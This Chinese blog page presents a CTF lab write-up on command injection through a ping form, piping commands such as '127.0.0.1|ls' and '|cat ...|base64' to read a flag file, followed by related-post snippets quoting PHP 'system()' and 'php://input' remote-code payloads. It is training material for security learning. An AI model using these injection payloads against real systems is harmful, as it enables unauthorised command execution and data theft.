CTFHUB-技能树-Web题-RCE（远程代码执行）-远程包含-命令注入

CTFHUB Web题RCE实战

最新推荐文章于 2025-09-27 09:59:30 发布

原创最新推荐文章于 2025-09-27 09:59:30 发布 · 219 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#web安全

CTFHUB解题思路专栏收录该内容

28 篇文章

订阅专栏

CTFHUB-技能树-Web题-RCE（远程代码执行）-远程包含-命令注入

ping -c 4 192.168.1.1表示ping4次

查看代码，需要输入ip地址

在这里插入图片描述

尝试输入127.0.01，返回了ping包情况

在这里插入图片描述

由于没有过滤，直接拼接cmd命令查看即可

127.0.0.1|ls

在这里插入图片描述

127.0.0.1|cat 25653369915628.php

在这里插入图片描述

提交了[1]没有东西
可以构造（也可以直接查看源代码）

127.0.0.1|cat 25653369915628.php|base64

在这里插入图片描述

对base64进行解密

在这里插入图片描述

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

python炒粉

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

题解记录-CTFHub技能树|Web|RCE

weixin_57448435的博客

09-15

1309

RCE漏洞，Hackbar插件的使用，cmd命令，运算符、空格、关键字flag、cat。

ctfhub技能树web：RCE里的eval执行和命令注入

2302_81010533的博客

03-30

778

远程命令/代码执行漏洞，简称为RCE漏洞，可以直接向服务器后台远程注入操作系统的命令或者代码，从而拿到服务器后台的权限。首先执行ping命令，ping本机ip:127.0.0.1,再加上ls这个系统命令，连起来就是127.0.0.1;ls接着查看里面的文件，构造命令127.0.0.1;检查网页显示内容可以发现题目中直接给出了一段源代码，代码的大致意思是判断用户是否传了一个 cmd 参数，否则执行 else。检查目录列表发现关于flag的文件，检查内容发现flag。，查看可以访问的文件，发现一个。

参与评论您还未登录，请先登录后发表或查看评论

CTFHub | 远程包含

尼泊罗河伯的博客

06-13

3184

远程文件包含（Remote File Inclusion，简称RFI）是一种常见的安全漏洞，它可以允许攻击者远程执行恶意代码或获取敏感信息。攻击者可以通过利用应用程序中易受攻击的包含程序来引入远程文件，这些文件通常包含恶意代码或其他危险的操作。如果应用程序没有正确处理和验证用户输入，那么攻击者就可以通过注入恶意代码来利用这个漏洞。

文件包含————ctfhub之远程包含

qq_45655564的博客

05-29

2213

远程文件包含漏洞在PHP的配置文件php.ini里将allow_url_fopen和allow_url_include设置为ON，include/require等包含函数可以加载远程文件，如果远程文件没经过严格的过滤，导致了执行恶意文件的代码，这就是远程文件包含漏洞。 CTFHUB之远程包含 ...

CTFHub RCE通关笔记5：文件包含远程包含

最新发布

mooyuan的网络安全博客

09-27

1185

本文详细分析了CTFHub中RCE-文件包含关卡的利用方法。通过审计靶场PHP源码，发现开发者错误使用strpos()函数导致安全防护失效，允许包含flag开头的文件。文章介绍了两种攻击方法：1)利用php://input协议执行POST请求中的PHP代码；2)通过构造以flag开头的路径（如flag/../../../flag）绕过黑名单检查。实战演示了如何查看系统目录和读取flag文件内容。文章还指出正确的防护方法应使用strpos()===false进行严格比较，避免类型转换的安全风险。

CTFHUB-技能树-Web题-RCE（远程代码执行）-远程包含-命令注入-过滤cat

Static______的博客

07-17

444

过滤cat就是找个能代替的。

CTFHUB-技能树-Web题-RCE（远程代码执行）-远程包含-命令注入-综合过滤练习

Static______的博客

08-19

891

根据题目提示以及代码。

CTFHUB-技能树-WEB通关

Alita_lxz的博客

11-11

7974

Web 题目来自ctfhub技能树web部分 Web前置技能操作系统数据库 HTTP协议请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法（也叫动作）来以不同方式操作指定的资源。 1.OPTIONS 　　返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功，则它会在HTTP头中包含一个名为“Allow”的头，值是所支持的方法，如“GET,POST”。　2.HEAD 　　向服务

CTFHUB--RCE--文件包含

qq_75120258的博客

03-02

1229

有时候由于网站功能需求，会让前端用户选择要包含的文件，而开发人员又没有对要包含的文件进行安全考虑，就导致攻击者可以通过修改文件的位置来让后台执行任意文件，从而导致文件包含漏洞。当它与包含函数结合时，php://filter经常会被当作代码呗执行，所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流（I/O streams）data://text/plain 任意代码执行。zlib:// — 压缩流。

ctfhub--ctf--web--RCE（1.eval执行2.文件包含3.常见伪协议用法4.php://input5.远程包含6.读取源代）

feiniaotjx的博客

10-05

731

RCE1.eval执行2.文件包含3.php://input 1.eval执行 request接受post和get请求，接受cmd参数使用远程系统命令遍历目录查看文件 2.文件包含需要传一个file参数，不能为flag，存在shell.txt,可连接shell，故可以访问?file=shell.txt 之后post提交ctfhub=system('cat /flag');查看flag 3.php://input ...

CTFHUB----web前置技能-rce

01-01

### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介远程命令执行（Remote Command Execution, RCE），是指攻击者能够通过应用程序接口发送特定指令，在服务器端执行任意操作系统级别的命令。这种...

CTFHub-技能树-web-RCE

yuqie的博客

06-14

707

RCE(Remote Code/Command Execute)为远程代码/命令执行的漏洞。攻击者可以直接在web页面向后台服务器远程注入操作系统命令或者代码，从而控制后台系统，这就是RCE漏洞。

CTFHUB 远程包含

nai_kai的博客

06-19

5414

CTFHUB 远程包含 ctfhub RCE 远程包含 write up 题目信息: “我没有shell，你怎么取flag？” 打开便是一个phpinfo() 用file包含phpinfo是有回显的，所以构造payload ： xxx:10080/?file=php://input post <?php system('ls');?> #if (!strpos($_GET["file"], "flag")) #过滤了get方式 ctfhub{34f653c72f8b095914

ctfhub-远程包含

m0_65766842的博客

03-02

264

ctfhub 远程包含

qq_52671379的博客

06-14

602

远程包含题目 php://input php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下，最好使用 php://input 来代替 $HTTP_RAW_POST_DATA，因为它不依赖于特定的 php.ini 指令。而且，这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充，比激活 always_populate_raw_post_data 潜在需要更少的内存。 enctype=“multipart/form-data” 的时候 php://input

CTFHub笔记之技能树RCE：eval执行、文件包含、远程包含、php://input、读取源代码

weixin_48799157的博客

03-28

5358

小白一个，如有错误请指正！一、eval执行 ?cmd=system("ls"); ?cmd=system("ls%20/"); ?cmd=system("cat%20/flag_26396");

CTFHub技能书解题笔记-RCE-远程包含

qq_43006864的博客

03-29

1466

直接开题：打开题目就是源代码。这里进行简单分析：这里还说了。我没有shell。源码这里使用的提到了file。既然是远程文件包含，那我们尝试使用file包含phpinfo 看样子能行他说没有shell，那我们利用远程文件包含漏洞结合php伪协议自己传入一个。这里提供利用样例截图。开始进行测试：传入phpinfo 成功运行PHPinfo。路线是对的，那就直接命令执行了。拿到flag，本题结束。重点...

ctfhub RCE

2202_75317918的博客

01-27

1273

ctfhub rce

CTFHUB-技能树-Web题-RCE（远程代码执行）-文件包含—远程包含

Static______的博客

06-28

617

还记得strpos函数吗，这段代码意思就是判断输入是否有flag字段，PHPinfo当中也表明php://input可以用。那么，利用php://input来寻找flag。没有flag，继续，查看上一级目录。没有flag，查看上一级目录。如果有就输出hacker。没有就进行include。bp抓包,url中输入。还是没有，继续往上查看。也可以直接查看根目录，